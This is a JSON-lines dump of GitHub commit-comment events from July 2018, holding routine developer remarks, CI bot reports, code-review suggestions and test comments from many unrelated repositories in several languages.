{"id":"8032063068","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29867842,"position":null,"line":null,"path":null,"commit_id":"5e30d379645fa7e38827384872725925cf3dc5b9","created_at":"2018-07-28T10:36:22Z","updated_at":"2018-07-28T10:36:22Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Siegerehrung: HUD](https://trello.com/c/z9Lxr10w/161-siegerehrung-hud)"}},"created_at":"2018-07-28T10:36:22Z"}
{"id":"8032063080","type":"CommitCommentEvent","actor":{"login":"Readock"},"repo":{"name":"BrotBerserker/InflectionPoint"},"payload":{"comment":{"id":29867843,"position":null,"line":null,"path":null,"commit_id":"5e30d379645fa7e38827384872725925cf3dc5b9","created_at":"2018-07-28T10:36:23Z","updated_at":"2018-07-28T10:36:23Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Siegerehrung: HUD](https://trello.com/c/z9Lxr10w/161-siegerehrung-hud)"}},"created_at":"2018-07-28T10:36:23Z"}
{"id":"8032065764","type":"CommitCommentEvent","actor":{"login":"imAnkitSingh"},"repo":{"name":"imAnkitSingh/-ANKIT-"},"payload":{"comment":{"id":29867844,"position":null,"line":null,"path":null,"commit_id":"d906a17795a21368284d422341c01748b566b6c7","created_at":"2018-07-28T10:38:55Z","updated_at":"2018-07-28T10:38:55Z","author_association":"OWNER","body":"![error in database](https://user-images.githubusercontent.com/ 41540488/43355761-c3f7c640-927f-11e8-8710-6ef46d53a1c2.PNG)\r\nwhat does this  mean  ?.when ever i try to  signup from android studio emulator  this message shows instead  of expected  but when i try to check php code by providing random values it works  fine data get stored in database but with android emulator it is not working. i am using Local host server  . i am a beginner."}},"created_at":"2018-07-28T10:38:55Z"}
{"id":"8032068085","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867856,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-28T10:41:02Z","updated_at":"2018-07-28T10:41:02Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2327 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-28T10:41:02Z"}
{"id":"8032070758","type":"CommitCommentEvent","actor":{"login":"carstene1ns"},"repo":{"name":"rock88/pcsx_rearmed"},"payload":{"comment":{"id":29867864,"position":18,"line":55,"path":"switch/source/main.c","commit_id":"087f3d09be8b924971017210dc5e08d9b79f5964","created_at":"2018-07-28T10:43:30Z","updated_at":"2018-07-28T10:43:30Z","author_association":"NONE","body":"That is because `gfxInitResolution()` is for startup, `gfxConfigureResolution()` is for later. :grinning:"}},"created_at":"2018-07-28T10:43:30Z"}
{"id":"8032074095","type":"CommitCommentEvent","actor":{"login":"Panchajanya1999"},"repo":{"name":"Nikish21/Zenfone-Max-Pro-M1"},"payload":{"comment":{"id":29867877,"position":null,"line":null,"path":null,"commit_id":"06b90a03e53fa630234c28342318aac0a6211777","created_at":"2018-07-28T10:46:27Z","updated_at":"2018-07-28T10:46:27Z","author_association":"CONTRIBUTOR","body":"This worked??"}},"created_at":"2018-07-28T10:46:27Z"}
{"id":"8032074139","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29867879,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T10:46:30Z","updated_at":"2018-07-28T10:46:30Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-28T10:46:30Z"}
{"id":"8032076709","type":"CommitCommentEvent","actor":{"login":"Levitanious"},"repo":{"name":"Levitanious/tempest-cms"},"payload":{"comment":{"id":29867889,"position":null,"line":null,"path":null,"commit_id":"fb32de3577398732af97b406971b9d833060f5fa","created_at":"2018-07-28T10:48:26Z","updated_at":"2018-07-28T10:48:26Z","author_association":"OWNER","body":"Awwww, what will i show to my grandchildren <shame shame>\r\n\r\nThanks for saving me there."}},"created_at":"2018-07-28T10:48:26Z"}
{"id":"8032077060","type":"CommitCommentEvent","actor":{"login":"rock88"},"repo":{"name":"rock88/pcsx_rearmed"},"payload":{"comment":{"id":29867890,"position":18,"line":55,"path":"switch/source/main.c","commit_id":"087f3d09be8b924971017210dc5e08d9b79f5964","created_at":"2018-07-28T10:48:39Z","updated_at":"2018-07-28T10:48:39Z","author_association":"OWNER","body":"Oooh, that works, thanks 🎉"}},"created_at":"2018-07-28T10:48:39Z"}
{"id":"8032080320","type":"CommitCommentEvent","actor":{"login":"GetAway1"},"repo":{"name":"tuxbox-neutrino/plugin-scripts-lua"},"payload":{"comment":{"id":29867895,"position":null,"line":null,"path":null,"commit_id":"1e76817f9fb2d0a94f5b9c8b78b0424606010d42","created_at":"2018-07-28T10:51:00Z","updated_at":"2018-07-28T10:51:00Z","author_association":"COLLABORATOR","body":"hi, why do you use this path neutrino_conf:loadConfig(\"/etc/neutrino/config/neutrino.conf\")"}},"created_at":"2018-07-28T10:51:00Z"}
{"id":"8032081903","type":"CommitCommentEvent","actor":{"login":"czhen1992"},"repo":{"name":"czhen1992/test"},"payload":{"comment":{"id":29867896,"position":null,"line":null,"path":null,"commit_id":"1cb3d44dfa3ef9ab2d2572248ff63dc11a93bd2c","created_at":"2018-07-28T10:52:03Z","updated_at":"2018-07-28T10:52:03Z","author_association":"OWNER","body":"换行  加了一个空格在Item 1之后"}},"created_at":"2018-07-28T10:52:03Z"}
{"id":"8032088957","type":"CommitCommentEvent","actor":{"login":"tusbar"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29867910,"position":null,"line":null,"path":null,"commit_id":"55970a895d56e96871886d73a41e003bc31050be","created_at":"2018-07-28T10:57:29Z","updated_at":"2018-07-28T10:57:29Z","author_association":"CONTRIBUTOR","body":"That works for me! Thanks for the heads-up!"}},"created_at":"2018-07-28T10:57:29Z"}
{"id":"8032092400","type":"CommitCommentEvent","actor":{"login":"czhen1992"},"repo":{"name":"czhen1992/test"},"payload":{"comment":{"id":29867926,"position":null,"line":null,"path":null,"commit_id":"8bcad82d491f377d997c36cb633487152703c126","created_at":"2018-07-28T11:00:30Z","updated_at":"2018-07-28T11:00:30Z","author_association":"OWNER","body":"only two space for newline"}},"created_at":"2018-07-28T11:00:30Z"}
{"id":"8032092499","type":"CommitCommentEvent","actor":{"login":"oats7777"},"repo":{"name":"oats7777/pythonUSB"},"payload":{"comment":{"id":29867928,"position":null,"line":null,"path":null,"commit_id":"737384dcddd5a6e36c91a3312abb249e461b41a6","created_at":"2018-07-28T11:00:34Z","updated_at":"2018-07-28T11:00:34Z","author_association":"OWNER","body":"list"}},"created_at":"2018-07-28T11:00:34Z"}
{"id":"8032093386","type":"CommitCommentEvent","actor":{"login":"czhen1992"},"repo":{"name":"czhen1992/test"},"payload":{"comment":{"id":29867935,"position":null,"line":null,"path":null,"commit_id":"7eeca155a2f53807ab368f5a9f938873712f0dc9","created_at":"2018-07-28T11:01:18Z","updated_at":"2018-07-28T11:01:18Z","author_association":"OWNER","body":"two space and enter"}},"created_at":"2018-07-28T11:01:18Z"}
{"id":"8032095324","type":"CommitCommentEvent","actor":{"login":"karb0f0s"},"repo":{"name":"TelegramBots/Telegram.Bot"},"payload":{"comment":{"id":29867938,"position":24,"line":78,"path":"src/Telegram.Bot/Requests/Update Messages/EditMessageMediaRequest.cs","commit_id":"09da1420517d79c6f22c45e631b6d6e3055182a5","created_at":"2018-07-28T11:02:59Z","updated_at":"2018-07-28T11:02:59Z","author_association":"MEMBER","body":"I think it look ugly. What about this:\r\n\r\n```csharp\r\npublic override HttpContent ToHttpContent()\r\n{\r\n    var media = Media as IInputMediaWithThumb;\r\n    if (!IsStream(Media.Media.FileType) && !IsStream(media?.Thumb?.FileType))\r\n        return base.ToHttpContent();\r\n\r\n    var content = GenerateMultipartFormDataContent();\r\n\r\n    if (IsStream(Media.Media.FileType))\r\n        content.AddStreamContent(Media.Media.Content, Media.Media.FileName);\r\n\r\n    if (IsStream(media?.Thumb?.FileType))\r\n        content.AddStreamContent(media.Thumb.Content, media.Thumb.FileName);\r\n\r\n    return content;\r\n\r\n    bool IsStream(FileType? fileType) =>\r\n        fileType != null && fileType == FileType.Stream;\r\n}\r\n```"}},"created_at":"2018-07-28T11:02:59Z"}
{"id":"8032097567","type":"CommitCommentEvent","actor":{"login":"choronam"},"repo":{"name":"mozilla/mozillians"},"payload":{"comment":{"id":29867943,"position":4,"line":604,"path":"mozillians/phonebook/views.py","commit_id":"5f45159c3d7e5af8d8a84dd085acb6d4e569aa49","created_at":"2018-07-28T11:04:52Z","updated_at":"2018-07-28T11:04:52Z","author_association":"NONE","body":"![711483-64](https://user-images.githubusercontent.com/38401724/43355931-b69484dc-9290-11e8-8bdc-f533c385d788.png)\r\n"}},"created_at":"2018-07-28T11:04:52Z"}
{"id":"8032100664","type":"CommitCommentEvent","actor":{"login":"choronam"},"repo":{"name":"mozilla/mozillians"},"payload":{"comment":{"id":29867949,"position":null,"line":null,"path":null,"commit_id":"c0f3b33f08254638aa03a7b3f78a4272241d790f","created_at":"2018-07-28T11:07:36Z","updated_at":"2018-07-28T11:07:36Z","author_association":"NONE","body":"![711483-64](https://user-images.githubusercontent.com/38401724/43355954-19771678-9291-11e8-830b-046f85be43fe.png)\r\n"}},"created_at":"2018-07-28T11:07:36Z"}
{"id":"8032101756","type":"CommitCommentEvent","actor":{"login":"Weixiang587"},"repo":{"name":"Bronze5yasuomain/OOADP"},"payload":{"comment":{"id":29867951,"position":null,"line":null,"path":null,"commit_id":"daa2f323c7e9f78806616a8504b1150ff97d305c","created_at":"2018-07-28T11:08:38Z","updated_at":"2018-07-28T11:08:38Z","author_association":"COLLABORATOR","body":"Redundant controller"}},"created_at":"2018-07-28T11:08:38Z"}
{"id":"8032103121","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29867953,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-28T11:09:51Z","updated_at":"2018-07-28T11:09:51Z","author_association":"OWNER","body":"@thaichessswinboard Thanks. For KNBQKN I do not really see any issues. In self-play Stockfish is able to win this endgame, and in the given position it even finds mate within ~20 seconds.\r\n\r\nFor KNBQK**R**, I am not sure whether it is possible to win. Is this endgame known to be winning by makruk endgame theorists (or even average players)? If so, could you please provide more info on the technique in this endgame, e.g., a PGN file or some link?\r\n\r\nBy not applying a drawish scale factor or by writing a dedicated endgame evaluation function, I can easily make it avoid the sacrifice of rook against bishop. However, although it tries to avoid the exchange at all costs then, Stockfish is not able to make much progress when playing this endgame against itself, since it seems to defend well with the rook side. Since I can not find much (or rather any) english literature on makruk endgame theory, I am kind of lost here."}},"created_at":"2018-07-28T11:09:51Z"}
{"id":"8032103654","type":"CommitCommentEvent","actor":{"login":"Mic92"},"repo":{"name":"dtzWill/nur-packages"},"payload":{"comment":{"id":29867955,"position":5,"line":5,"path":"pkgs/xed/default.nix","commit_id":"0d55a0f6b8dd3b5ac679cdbcbbf2c67e97db3ec5","created_at":"2018-07-28T11:10:16Z","updated_at":"2018-07-28T11:10:16Z","author_association":"NONE","body":"Seem like I can remove this? https://github.com/Mic92/nur-packages/blob/master/xed/default.nix"}},"created_at":"2018-07-28T11:10:16Z"}
{"id":"8032113012","type":"CommitCommentEvent","actor":{"login":"gunn3r"},"repo":{"name":"gunn3r/test-repo"},"payload":{"comment":{"id":29867977,"position":null,"line":null,"path":null,"commit_id":"fd57f6529f0658d3f0fffde35048494dfd486830","created_at":"2018-07-28T11:18:20Z","updated_at":"2018-07-28T11:18:20Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-28T11:18:20Z"}
{"id":"8032113919","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29867979,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-28T11:19:12Z","updated_at":"2018-07-28T11:19:12Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1676 of 1676 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.32%25-green.png)</a>\n"}},"created_at":"2018-07-28T11:19:12Z"}
{"id":"8032116079","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/helics-feedstock"},"payload":{"comment":{"id":29867982,"position":null,"line":null,"path":null,"commit_id":"af05b2bd207a29cbd9dbc82555be9073b7e9e8e8","created_at":"2018-07-28T11:21:08Z","updated_at":"2018-07-28T11:21:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kdheepak was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T11:21:08Z"}
{"id":"8032116518","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Community-Dark"},"payload":{"comment":{"id":29867984,"position":75,"line":260,"path":"github-community-dark.user.css","commit_id":"80754c37a7d1c88cfea129334fe382ca750673c3","created_at":"2018-07-28T11:21:31Z","updated_at":"2018-07-28T11:21:31Z","author_association":"MEMBER","body":"@Mottie not sure what perfectionist is thinking about this here :) align to colon?"}},"created_at":"2018-07-28T11:21:31Z"}
{"id":"8032116736","type":"CommitCommentEvent","actor":{"login":"Dimous"},"repo":{"name":"darmie/linc_yoga"},"payload":{"comment":{"id":29867985,"position":60,"line":38,"path":"facebook/yoga/Style.hx","commit_id":"2b813c9ff9459eb14c85f691d74b8419d13be35a","created_at":"2018-07-28T11:21:44Z","updated_at":"2018-07-28T11:21:44Z","author_association":"NONE","body":"you forgot semicolon"}},"created_at":"2018-07-28T11:21:44Z"}
{"id":"8032116835","type":"CommitCommentEvent","actor":{"login":"tanertas"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29867986,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T11:21:49Z","updated_at":"2018-07-28T11:21:49Z","author_association":"CONTRIBUTOR","body":"Well, what if our bunch of commits contain overlapped changes on one single component? I think that we can overcome such situations with commenting, rather than using official repos like a mirror. If comments can tell what have done briefly, anyone would follow history with no trouble. I actually didn't mean the package repo named \"community\" in previous message, I mean Alpine related non-personal official repos. Sorry for that."}},"created_at":"2018-07-28T11:21:49Z"}
{"id":"8032126683","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29868016,"position":null,"line":null,"path":null,"commit_id":"0bb3e90ee85c976a9f8cf31f3bace04cf3b0a003","created_at":"2018-07-28T11:30:51Z","updated_at":"2018-07-28T11:30:51Z","author_association":"MEMBER","body":">  I think that we can overcome such situations with commenting, rather than using official repos like a mirror.\r\n\r\nNo. And I don't understand what do you mean with \"mirror\" in this context.\r\n\r\n> If comments can tell what have done briefly, anyone would follow history with no trouble.\r\n\r\nNo, that would just make it much harder. It's anti-pattern and for good reasons. Everyone who have experience with reviews and troubleshooting regressions know it.\r\n\r\nWhat's your point? Why it even bothers you?"}},"created_at":"2018-07-28T11:30:51Z"}
{"id":"8032129156","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868029,"position":48,"line":131,"path":"index.html","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-28T11:33:07Z","updated_at":"2018-07-28T11:33:07Z","author_association":"COLLABORATOR","body":"Т.e. тебя не смущало когда был img и src атрибут?) а это тоже самое только с дивом"}},"created_at":"2018-07-28T11:33:07Z"}
{"id":"8032132808","type":"CommitCommentEvent","actor":{"login":"MihaZupan"},"repo":{"name":"TelegramBots/Telegram.Bot"},"payload":{"comment":{"id":29868032,"position":24,"line":78,"path":"src/Telegram.Bot/Requests/Update Messages/EditMessageMediaRequest.cs","commit_id":"09da1420517d79c6f22c45e631b6d6e3055182a5","created_at":"2018-07-28T11:36:10Z","updated_at":"2018-07-28T11:36:10Z","author_association":"MEMBER","body":"I think changing `var media` to something like `var thumbnail` would be more readable"}},"created_at":"2018-07-28T11:36:10Z"}
{"id":"8032133952","type":"CommitCommentEvent","actor":{"login":"mcallegari"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29868034,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-28T11:37:11Z","updated_at":"2018-07-28T11:37:11Z","author_association":"OWNER","body":"As usual, I need practical references, cause the whole theory is not helping me. If found this\r\nhttp://www.physicsclassroom.com/class/light/Lesson-2/Color-Subtraction\r\nand this\r\nhttp://www.physicsclassroom.com/Physics-Interactives/Light-and-Color/Color-Filters/Color-Filters-Interactive\r\n\r\nIs that how it is supposed to work ? If so, I will extract the formula and translate it into code."}},"created_at":"2018-07-28T11:37:11Z"}
{"id":"8032134235","type":"CommitCommentEvent","actor":{"login":"schrej"},"repo":{"name":"pterodactyl/documentation"},"payload":{"comment":{"id":29868038,"position":3,"line":3,"path":".vuepress/theme/styles/variables.css","commit_id":"1d055089cd95e82fa444d22a4643705090f6135d","created_at":"2018-07-28T11:37:27Z","updated_at":"2018-07-28T11:37:27Z","author_association":"MEMBER","body":"\"fixes\""}},"created_at":"2018-07-28T11:37:27Z"}
{"id":"8032135949","type":"CommitCommentEvent","actor":{"login":"corny"},"repo":{"name":"digineo/go-dhclient"},"payload":{"comment":{"id":29868041,"position":47,"line":47,"path":"cmd/dhclient/main.go","commit_id":"02ae90037a383c7733c6499dc1edf5935e75de0d","created_at":"2018-07-28T11:38:57Z","updated_at":"2018-07-28T11:38:57Z","author_association":"MEMBER","body":"`flag.CommandLine.Output()` fails on CircleCi:\r\nhttps://circleci.com/gh/digineo/go-dhclient/5"}},"created_at":"2018-07-28T11:38:57Z"}
{"id":"8032137279","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"dsh2dsh/op2ogse"},"payload":{"comment":{"id":29868045,"position":null,"line":null,"path":null,"commit_id":"ef75291091c46c323de3c8e7bf44e1ba749fa52a","created_at":"2018-07-28T11:40:11Z","updated_at":"2018-07-28T11:40:11Z","author_association":"OWNER","body":"Не могу сказать. Хуже не стало. Изменилось-ли что-нибудь вообще? Шут его знает. Из меня такой ценитель графики..."}},"created_at":"2018-07-28T11:40:11Z"}
{"id":"8032139396","type":"CommitCommentEvent","actor":{"login":"AndreiMuvila"},"repo":{"name":"InMir/Mafia-on-the-knees"},"payload":{"comment":{"id":29868049,"position":null,"line":null,"path":null,"commit_id":"fb569a478fa73cca653d6cc91eb4617771468a7c","created_at":"2018-07-28T11:42:03Z","updated_at":"2018-07-28T11:42:03Z","author_association":"COLLABORATOR","body":"[logic.txt](https://github.com/InMir/Mafia-on-the-knees/files/2237930/logic.txt)\r\nВроде норм. Но надо подумать над деталями.\r\n"}},"created_at":"2018-07-28T11:42:03Z"}
{"id":"8032139967","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868050,"position":58,"line":58,"path":"js/form.js","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-28T11:42:32Z","updated_at":"2018-07-28T11:42:32Z","author_association":"COLLABORATOR","body":"Миша, это тоже самое если бы я присваивал переменной значение, потом дописывал **break** и в конце  возвращал переменную.\r\nно это shorthand"}},"created_at":"2018-07-28T11:42:32Z"}
{"id":"8032140510","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868052,"position":58,"line":58,"path":"js/form.js","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-28T11:43:00Z","updated_at":"2018-07-28T11:43:00Z","author_association":"COLLABORATOR","body":"они часто используются"}},"created_at":"2018-07-28T11:43:00Z"}
{"id":"8032140901","type":"CommitCommentEvent","actor":{"login":"NBR-hugh"},"repo":{"name":"Vwan/sicp-lamp"},"payload":{"comment":{"id":29868054,"position":21,"line":72,"path":"ch2/2.2HierarchicalDataandtheClosureProperty.md","commit_id":"6d1f9a8e5d23f16cf22fd0f8a74e482db6155d60","created_at":"2018-07-28T11:43:21Z","updated_at":"2018-07-28T11:43:21Z","author_association":"NONE","body":"@Vwan  这里的意思可以理解为 重 What 而不是 How 吗?"}},"created_at":"2018-07-28T11:43:21Z"}
{"id":"8032141604","type":"CommitCommentEvent","actor":{"login":"alexey-lysiuk"},"repo":{"name":"coelckers/gzdoom"},"payload":{"comment":{"id":29868058,"position":null,"line":null,"path":null,"commit_id":"3b53f31da33e4a06b9b1af6e25151d0e39cf7106","created_at":"2018-07-28T11:43:56Z","updated_at":"2018-07-28T11:43:56Z","author_association":"COLLABORATOR","body":"Maybe I'm missing something but the default value of `fullscreen` CVAR is still [false](https://github.com/coelckers/gzdoom/blob/9768698eda36d36b8ca2d7a5ffc91d88d97a2863/src/v_video.cpp#L882)."}},"created_at":"2018-07-28T11:43:56Z"}
{"id":"8032142089","type":"CommitCommentEvent","actor":{"login":"Apindes"},"repo":{"name":"MikhailDumchev/yaroslav-samoylov"},"payload":{"comment":{"id":29868062,"position":23,"line":74,"path":"scss/_courses-list.scss","commit_id":"913aaf68e387f6b1d84dca52e496deab886842de","created_at":"2018-07-28T11:44:21Z","updated_at":"2018-07-28T11:44:21Z","author_association":"COLLABORATOR","body":"да. тут забыл ее"}},"created_at":"2018-07-28T11:44:21Z"}
{"id":"8032146609","type":"CommitCommentEvent","actor":{"login":"KerberX"},"repo":{"name":"KerberX/PrivateProfileRedirector"},"payload":{"comment":{"id":29868073,"position":null,"line":null,"path":null,"commit_id":"d63dbb57eecbcd759b2b9ae8e1aee993b9af37dd","created_at":"2018-07-28T11:48:22Z","updated_at":"2018-07-28T11:48:22Z","author_association":"OWNER","body":"Empty, why it's empty?"}},"created_at":"2018-07-28T11:48:22Z"}
{"id":"8032146997","type":"CommitCommentEvent","actor":{"login":"ahd88"},"repo":{"name":"ahd88/happylife"},"payload":{"comment":{"id":29868074,"position":5,"line":20,"path":"src/com/hl/controllers/LoginController.java","commit_id":"e096454f60234dc671bc1ff4cb8fbf307826aebe","created_at":"2018-07-28T11:48:45Z","updated_at":"2018-07-28T11:48:45Z","author_association":"OWNER","body":"??/"}},"created_at":"2018-07-28T11:48:45Z"}
{"id":"8032153872","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868084,"position":11,"line":11,"path":"lesson1/pfwght.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:54:43Z","updated_at":"2018-07-28T11:54:43Z","author_association":"NONE","body":"нет пустой строки в конце файла"}},"created_at":"2018-07-28T11:54:43Z"}
{"id":"8032154065","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868085,"position":3,"line":3,"path":"lesson1/pfwght.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:54:53Z","updated_at":"2018-07-28T11:54:53Z","author_association":"NONE","body":"sleep лучше не использовать нигде) \r\n"}},"created_at":"2018-07-28T11:54:53Z"}
{"id":"8032154758","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868087,"position":5,"line":5,"path":"lesson1/pfwght.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:55:30Z","updated_at":"2018-07-28T11:55:30Z","author_association":"NONE","body":"to_i лучше делать в момент получения, тогда в user_height будет храниться число, что и ожидается "}},"created_at":"2018-07-28T11:55:30Z"}
{"id":"8032154942","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868088,"position":7,"line":7,"path":"lesson1/pfwght.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:55:39Z","updated_at":"2018-07-28T11:55:39Z","author_association":"NONE","body":"вот тут отступы не нужны"}},"created_at":"2018-07-28T11:55:39Z"}
{"id":"8032155166","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"ruuke/Tasks"},"payload":{"comment":{"id":29868089,"position":10,"line":10,"path":"lesson1/rect_tr.rb","commit_id":"307df4eee9eb05d552ac8fd92c5a90b1b375f508","created_at":"2018-07-28T11:55:52Z","updated_at":"2018-07-28T11:55:52Z","author_association":"NONE","body":"вот тут отступы не нужны"}},"created_at":"2018-07-28T11:55:52Z"}
{"id":"8032155445","type":"CommitCommentEvent","actor":{"login":"lakhanibh"},"repo":{"name":"lakhanibh/Codebase"},"payload":{"comment":{"id":29868090,"position":null,"line":null,"path":null,"commit_id":"20e2a05e4cfd2b83638fd51a9f325f7b0b389ebf","created_at":"2018-07-28T11:56:06Z","updated_at":"2018-07-28T11:56:06Z","author_association":"OWNER","body":"wreq"}},"created_at":"2018-07-28T11:56:06Z"}
{"id":"8032155533","type":"CommitCommentEvent","actor":{"login":"lakhanibh"},"repo":{"name":"lakhanibh/Codebase"},"payload":{"comment":{"id":29868091,"position":null,"line":null,"path":null,"commit_id":"20e2a05e4cfd2b83638fd51a9f325f7b0b389ebf","created_at":"2018-07-28T11:56:10Z","updated_at":"2018-07-28T11:56:10Z","author_association":"OWNER","body":"ewrq"}},"created_at":"2018-07-28T11:56:10Z"}
{"id":"8032155596","type":"CommitCommentEvent","actor":{"login":"lakhanibh"},"repo":{"name":"lakhanibh/Codebase"},"payload":{"comment":{"id":29868092,"position":null,"line":null,"path":null,"commit_id":"20e2a05e4cfd2b83638fd51a9f325f7b0b389ebf","created_at":"2018-07-28T11:56:13Z","updated_at":"2018-07-28T11:56:13Z","author_association":"OWNER","body":"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee"}},"created_at":"2018-07-28T11:56:13Z"}
{"id":"8032155653","type":"CommitCommentEvent","actor":{"login":"yvcvenkat"},"repo":{"name":"yvcvenkat/ven"},"payload":{"comment":{"id":29868094,"position":null,"line":null,"path":null,"commit_id":"d1d7452c428bac49c1b9ac31ddddd83837e5065c","created_at":"2018-07-28T11:56:16Z","updated_at":"2018-07-28T11:56:16Z","author_association":"OWNER","body":"updated by venkat"}},"created_at":"2018-07-28T11:56:16Z"}
